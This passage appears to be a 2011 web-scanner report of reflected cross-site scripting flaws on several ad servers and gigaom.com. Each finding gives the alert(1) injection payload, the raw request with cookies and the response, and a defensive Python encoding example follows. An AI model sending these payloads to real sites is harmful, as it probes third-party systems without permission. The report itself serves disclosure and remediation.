The value of the alias request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c264a"-alert(1)-"99d36684df2 was submitted in the alias parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /addyn/3.0/5242.1/1200449/0/225/ADTECH;alias=InformationWeek_Software_HP_Bottom_728x90;key=225700573b6576c264a"-alert(1)-"99d36684df2 HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://www.informationweek.com/news/software/hosted/showArticle.jhtml?articleID=225700573b6576%22%3E%3Cscript%3Ealert(1)%3C/script%3Ecebc826cf51&subSection=Hosted+Software
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4D30B9576E651A440C6EAF39F001851E; autotrdr_exclude=autotrdr_exclude
Response
HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 1135
4.12. http://adserver.adtechus.com/addyn/3.0/5242.1/1200449/0/225/ADTECH [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://adserver.adtechus.com
Path: /addyn/3.0/5242.1/1200449/0/225/ADTECH
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 72594'-alert(1)-'805f5bcf179 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /addyn/3.0/5242.1/1200449/0/225/ADTECH;alias=InformationWeek_Software_HP_Bottom_728x90;key=225700573b6576&72594'-alert(1)-'805f5bcf179=1 HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://www.informationweek.com/news/software/hosted/showArticle.jhtml?articleID=225700573b6576%22%3E%3Cscript%3Ealert(1)%3C/script%3Ecebc826cf51&subSection=Hosted+Software
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4D30B9576E651A440C6EAF39F001851E; autotrdr_exclude=autotrdr_exclude
Response
HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 1144
The value of the alias request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5308d'-alert(1)-'e15412e718f was submitted in the alias parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /addyn/3.0/5242.1/1200533/0/16/ADTECH;alias=InformationWeek_Software_HP_Pagepeel_1x1;key=225700573b65765308d'-alert(1)-'e15412e718f HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://www.informationweek.com/news/software/hosted/showArticle.jhtml?articleID=225700573b6576%22%3E%3Cscript%3Ealert(1)%3C/script%3Ecebc826cf51&subSection=Hosted+Software
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4D30B9576E651A440C6EAF39F001851E; autotrdr_exclude=autotrdr_exclude
Response
HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 302
4.14. http://adserver.adtechus.com/addyn/3.0/5242.1/1200533/0/16/ADTECH [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://adserver.adtechus.com
Path: /addyn/3.0/5242.1/1200533/0/16/ADTECH
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 718fe'-alert(1)-'ef1ab54d48e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /addyn/3.0/5242.1/1200533/0/16/ADTECH;alias=InformationWeek_Software_HP_Pagepeel_1x1;key=225700573b6576&718fe'-alert(1)-'ef1ab54d48e=1 HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://www.informationweek.com/news/software/hosted/showArticle.jhtml?articleID=225700573b6576%22%3E%3Cscript%3Ealert(1)%3C/script%3Ecebc826cf51&subSection=Hosted+Software
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4D30B9576E651A440C6EAF39F001851E; autotrdr_exclude=autotrdr_exclude
Response
HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 305
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fadbd"><script>alert(1)</script>a72a2aad66 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adiframefadbd"><script>alert(1)</script>a72a2aad66/3.0/5132/1229906/0/225/ADTECH%3Btarget%3D_blank%3Bsub1%3Diframe%3Bsub2%3D%3Bmisc%3D1296921577126;kvq=D;kvq=T;rdclick=http://ads.addynamix.com/click/2-2126953-88-77064-103949-1296921505?target= HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/297/wetpaintv1/728x90/technology-btf?t=1296921576218&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fhtcwiki.wetpaint.com%2F&refer=
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4D30B9576E651A440C6EAF39F001851E; autotrdr_exclude=autotrdr_exclude
Response
HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 395
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e4411"><script>alert(1)</script>ac47f18584 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adiframe/3.0e4411"><script>alert(1)</script>ac47f18584/5132/1229906/0/225/ADTECH%3Btarget%3D_blank%3Bsub1%3Diframe%3Bsub2%3D%3Bmisc%3D1296921577126;kvq=D;kvq=T;rdclick=http://ads.addynamix.com/click/2-2126953-88-77064-103949-1296921505?target= HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/297/wetpaintv1/728x90/technology-btf?t=1296921576218&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fhtcwiki.wetpaint.com%2F&refer=
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4D30B9576E651A440C6EAF39F001851E; autotrdr_exclude=autotrdr_exclude
Response
HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 395
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a8ad4"><script>alert(1)</script>a8e06f27e2c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adiframe/3.0/5132a8ad4"><script>alert(1)</script>a8e06f27e2c/1229906/0/225/ADTECH%3Btarget%3D_blank%3Bsub1%3Diframe%3Bsub2%3D%3Bmisc%3D1296921577126;kvq=D;kvq=T;rdclick=http://ads.addynamix.com/click/2-2126953-88-77064-103949-1296921505?target= HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/297/wetpaintv1/728x90/technology-btf?t=1296921576218&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fhtcwiki.wetpaint.com%2F&refer=
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4D30B9576E651A440C6EAF39F001851E; autotrdr_exclude=autotrdr_exclude
Response
HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 396
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7292a"><script>alert(1)</script>cdc932fa922 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adiframe/3.0/5132/12299067292a"><script>alert(1)</script>cdc932fa922/0/225/ADTECH%3Btarget%3D_blank%3Bsub1%3Diframe%3Bsub2%3D%3Bmisc%3D1296921577126;kvq=D;kvq=T;rdclick=http://ads.addynamix.com/click/2-2126953-88-77064-103949-1296921505?target= HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/297/wetpaintv1/728x90/technology-btf?t=1296921576218&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fhtcwiki.wetpaint.com%2F&refer=
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4D30B9576E651A440C6EAF39F001851E; autotrdr_exclude=autotrdr_exclude
Response
HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 396
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 55314"><script>alert(1)</script>2025c2eac3c was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adiframe/3.0/5132/1229906/055314"><script>alert(1)</script>2025c2eac3c/225/ADTECH%3Btarget%3D_blank%3Bsub1%3Diframe%3Bsub2%3D%3Bmisc%3D1296921577126;kvq=D;kvq=T;rdclick=http://ads.addynamix.com/click/2-2126953-88-77064-103949-1296921505?target= HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/297/wetpaintv1/728x90/technology-btf?t=1296921576218&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fhtcwiki.wetpaint.com%2F&refer=
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4D30B9576E651A440C6EAF39F001851E; autotrdr_exclude=autotrdr_exclude
Response
HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 396
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7eb5f"><script>alert(1)</script>5de7a93b83c was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adiframe/3.0/5132/1229906/0/2257eb5f"><script>alert(1)</script>5de7a93b83c/ADTECH%3Btarget%3D_blank%3Bsub1%3Diframe%3Bsub2%3D%3Bmisc%3D1296921577126;kvq=D;kvq=T;rdclick=http://ads.addynamix.com/click/2-2126953-88-77064-103949-1296921505?target= HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/297/wetpaintv1/728x90/technology-btf?t=1296921576218&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fhtcwiki.wetpaint.com%2F&refer=
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4D30B9576E651A440C6EAF39F001851E; autotrdr_exclude=autotrdr_exclude
Response
HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 396
The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2499b"><script>alert(1)</script>0337affee79 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adiframe/3.0/5132/1229906/0/225/ADTECH%3Btarget%3D_blank%3Bsub1%3Diframe%3Bsub2%3D%3Bmisc%3D12969215771262499b"><script>alert(1)</script>0337affee79;kvq=D;kvq=T;rdclick=http://ads.addynamix.com/click/2-2126953-88-77064-103949-1296921505?target= HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/297/wetpaintv1/728x90/technology-btf?t=1296921576218&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fhtcwiki.wetpaint.com%2F&refer=
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4D30B9576E651A440C6EAF39F001851E; autotrdr_exclude=autotrdr_exclude
Response
HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 396
The value of the kvq request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e5c7c"><script>alert(1)</script>73aeac3c218 was submitted in the kvq parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adiframe/3.0/5132/1229906/0/225/ADTECH%3Btarget%3D_blank%3Bsub1%3Diframe%3Bsub2%3D%3Bmisc%3D1296921577126;kvq=D;kvq=T;rdclick=http://ads.addynamix.com/click/2-2126953-88-77064-103949-1296921505?target=e5c7c"><script>alert(1)</script>73aeac3c218 HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/297/wetpaintv1/728x90/technology-btf?t=1296921576218&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fhtcwiki.wetpaint.com%2F&refer=
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4D30B9576E651A440C6EAF39F001851E; autotrdr_exclude=autotrdr_exclude
Response
HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 396
4.23. http://adserver.adtechus.com/adiframe/3.0/5132/1229906/0/225/ADTECH%3Btarget%3D_blank%3Bsub1%3Diframe%3Bsub2%3D%3Bmisc%3D1296921577126 [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 80e34"><script>alert(1)</script>42beed0cd1e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adiframe/3.0/5132/1229906/0/225/ADTECH%3Btarget%3D_blank%3Bsub1%3Diframe%3Bsub2%3D%3Bmisc%3D1296921577126;kvq=D;kvq=T;rdclick=http://ads.addynamix.com/click/2-2126953-88-77064-103949-1296921505?target=&80e34"><script>alert(1)</script>42beed0cd1e=1 HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/297/wetpaintv1/728x90/technology-btf?t=1296921576218&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fhtcwiki.wetpaint.com%2F&refer=
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4D30B9576E651A440C6EAF39F001851E; autotrdr_exclude=autotrdr_exclude
Response
HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 399
The value of the var request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 5d970%3balert(1)//85e58cc1d4b was submitted in the var parameter. This input was echoed as 5d970;alert(1)//85e58cc1d4b in the application's response. In the response the value is used directly as the name in a var declaration, so the ; terminates that declaration, alert(1) runs as a separate statement and // discards the rest of the line. Because there is no enclosing quote to escape, no output encoding can make this context safe; the value has to be validated against the characters permitted in a JavaScript identifier before it is written out.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /BurstingPipe/ActivityServer.bs?cn=as&vn=omn&activityID=32638&advID=33048&var=s_1_Integrate_Eyeblaster_ACM_get_05d970%3balert(1)//85e58cc1d4b&rnd=9155849178792 HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://www.rackspace.com/index.php
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u3=1; C4=; ActivityInfo=000p81bCx%5f; eyeblaster=BWVal=408&BWDate=40573.510532&debuglevel=&FLV=10.1103&RES=128&WMPV=0; A3=h5j3abNz07l00000.h5iUabNz07l00000Qf+JvabEk02WG00002gNfHaaiN0aVX00001gn3Ka4JO09MY00001gYyfadw90cvM00001gL2MadKj0bdR00001fU+La50V0a+r00001h802ae7k0c6L00001gKXMaepH0bdR00001gKXNaepP0bdR00001gYx+adw90cvM00001fUFGa50V02WG00001gy3.ach00c9M00001cRreabeg03Dk00001gy7La9bU0c9M00003gCTVa9bU0c9M00001gy5Da9bU0c9M00001gvKEacgY0c9M00001ge4Gack+0bM000001gNQ4ae7r0c9M00001ge4Hack+0bM000001; B3=89PS000000000QsZ7lgH0000000001sG89PT000000000.sZ8bwx0000000001t48i440000000001t28mb20000000001t4852G0000000003sS82790000000002t57dNH0000000002sZ7GHq0000000001s.7FCH0000000001s.8cVQ0000000001sV83xP0000000001sF82980000000001t3852N0000000001s.6o.Q0000000001sY87ma0000000001s.8i430000000001t27gi30000000001sG852z0000000001sS852A0000000001sS; u2=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G601g
Response
HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: u2=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G601g; expires=Fri, 06-May-2011 10:21:35 GMT; domain=.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Sat, 05 Feb 2011 15:21:35 GMT
Connection: close
Content-Length: 89
var s_1_Integrate_Eyeblaster_ACM_get_05d970;alert(1)//85e58cc1d4b = {"errorCode": "nc" };
The value of the uid request parameter is copied into the HTML document as plain text between tags. The payload 286b8<script>alert(1)</script>b7b9580d4d was submitted in the uid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /event.flow?eventcode=000_000_1&location=http%3A%2F%2Fhtcwiki.wetpaint.com%2F&uid=W25t6coj820hSGmI286b8<script>alert(1)</script>b7b9580d4d&xy=251%2C232&wh=985%2C1012&cookieenabled=1&screenwh=1920%2C1200&adwh=728%2C90&colordepth=16&flash=10.1&iframed=0 HTTP/1.1
Host: event.adxpose.com
Proxy-Connection: keep-alive
Referer: http://htcwiki.wetpaint.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: evlu=ddad3821-ec58-4641-be95-961ec5aac4d2
Response
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=3D12D8119D7E0EE9993CA5854A82CAC7; Path=/
Cache-Control: no-store
Content-Type: text/javascript;charset=UTF-8
Content-Length: 137
Date: Sat, 05 Feb 2011 15:59:37 GMT
Connection: close
if (typeof __ADXPOSE_EVENT_QUEUES__ !== "undefined") __ADXPOSE_DRAIN_QUEUE__("W25t6coj820hSGmI286b8<script>alert(1)</script>b7b9580d4d");
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 23d7a'><script>alert(1)</script>6c3841f6dc1 was submitted in the REST URL parameter 4. This input was echoed as 23d7a\'><script>alert(1)</script>6c3841f6dc1 in the application's response. The backslash inserted before the quote is a JavaScript-style escape; HTML gives a backslash no special meaning inside an attribute value, so the quote still terminates the attribute and the script tag that follows is parsed as markup.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2010/06/22/cloud-computing23d7a'><script>alert(1)</script>6c3841f6dc1/ HTTP/1.1
Host: gigaom.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Server: nginx
Date: Sat, 05 Feb 2011 15:28:10 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Cookie
X-hacker: If you're reading this, you should visit automattic.com/jobs and apply to join the fun, mention this header.
X-Pingback: http://gigaom.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 05 Feb 2011 15:28:08 GMT
Cache-Control: no-cache, must-revalidate, max-age=60
Pragma: no-cache
Content-Length: 82472
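The findings above reflect the scanner's canary into three different output contexts: a JavaScript string literal in double or single quotes (the adserver.adtechus.com addyn issues), an unquoted position where the value becomes a variable name (bs.serving-sys.com), and an HTML attribute value where gigaom.com escaped the quote as \' in JavaScript style. The Python below is an added example, not code from any of those applications or from the scanner report. It shows the context-specific encoder each case needs, mirrors the JavaScript and HTML tokenisers just far enough to check where each literal actually ends, and uses the page's own payloads to confirm that the encoded form can no longer leave its context. The function names and the var key = ... line it renders are illustrative assumptions, not the ad server's code.

```python
import html
import re

# Canary payloads copied from the findings above, one per reflection context.
JS_DQ_PAYLOAD = '1b1ea"-alert(1)-"2fbf835ceb6'            # JS string, double quotes (addyn)
JS_SQ_PAYLOAD = "72594'-alert(1)-'805f5bcf179"            # JS string, single quotes (addyn)
JS_BARE_PAYLOAD = "5d970;alert(1)//85e58cc1d4b"           # bare JS expression (serving-sys)
ATTR_SQ_PAYLOAD = "23d7a'><script>alert(1)</script>6c3841f6dc1"  # HTML attribute, single quotes (gigaom)


def js_string_encode(value: str) -> str:
    """Encode a value for the inside of a JavaScript string literal of either quote style.

    Everything except ASCII letters and digits becomes a \\uXXXX escape, so the
    output cannot contain a quote, a backslash, a line terminator (including
    U+2028/U+2029, which JSON allows but JavaScript treats as newlines) or the
    '<' needed to form '</script>'. Astral code points become surrogate pairs.
    """
    out = []
    for ch in value:
        cp = ord(ch)
        if ch.isascii() and ch.isalnum():
            out.append(ch)
        elif cp < 0x10000:
            out.append("\\u%04x" % cp)
        else:
            cp -= 0x10000
            out.append("\\u%04x\\u%04x" % (0xD800 + (cp >> 10), 0xDC00 + (cp & 0x3FF)))
    return "".join(out)


def js_literal_content(src: str, quote: str) -> str:
    """Content of the JavaScript string literal that starts at src[0] (== quote).

    Mirrors the JS lexer: a backslash escapes the following character, and the
    literal ends at the first unescaped matching quote.
    """
    if src[0] != quote:
        raise ValueError("literal does not start with the expected quote")
    i = 1
    while i < len(src):
        if src[i] == "\\":
            i += 2
            continue
        if src[i] == quote:
            return src[1:i]
        i += 1
    raise ValueError("unterminated string literal")


def render_js_string(value: str, quote: str = '"') -> str:
    """Assumed server-side template (not the ad server's): value inside a quoted JS string."""
    return "var key = %s%s%s;" % (quote, js_string_encode(value), quote)


def html_attr_encode(value: str) -> str:
    """Encode for an HTML attribute value: &, <, >, double and single quotes become entities."""
    return html.escape(value, quote=True)


def html_attr_content(src: str, quote: str) -> str:
    """Content of an HTML attribute value that starts at src[0] (== quote).

    HTML gives a backslash no meaning here: the value ends at the first matching
    quote, which is why the \\' seen on gigaom.com does not help.
    """
    if src[0] != quote:
        raise ValueError("attribute value does not start with the expected quote")
    return src[1:src.index(quote, 1)]


# Allow-list for the one context no encoder can fix: the value *is* a JS identifier.
_IDENT = re.compile(r"^[A-Za-z_$][A-Za-z0-9_$]*$")
_RESERVED = frozenset("var let const function return if else this new delete "
                      "typeof void in of class eval arguments".split())


def is_safe_js_identifier(value: str) -> bool:
    return bool(_IDENT.match(value)) and value not in _RESERVED


def render_bare_var(value: str) -> str:
    """The serving-sys context: the value becomes the variable name itself.
    Reject anything that is not a plain identifier; there is nothing to escape."""
    if not is_safe_js_identifier(value):
        raise ValueError("refusing to use a non-identifier as a variable name")
    return 'var %s = {"errorCode": "nc" };' % value


if __name__ == "__main__":
    for quote, payload in (('"', JS_DQ_PAYLOAD), ("'", JS_SQ_PAYLOAD)):
        print("raw literal ends after:", js_literal_content(quote + payload + quote, quote))
        print("encoded:", render_js_string(payload, quote))
    weak = ATTR_SQ_PAYLOAD.replace("'", "\\'")        # the backslash "fix" seen above
    print("attribute with \\' still ends at:", html_attr_content("'" + weak + "'", "'"))
    print("attribute encoded:", html_attr_encode(ATTR_SQ_PAYLOAD))
    print("identifier ok:", is_safe_js_identifier("s_1_Integrate_Eyeblaster_ACM_get_0"))
    print("payload ok:", is_safe_js_identifier("s_1_Integrate_Eyeblaster_ACM_get_0" + JS_BARE_PAYLOAD))
```

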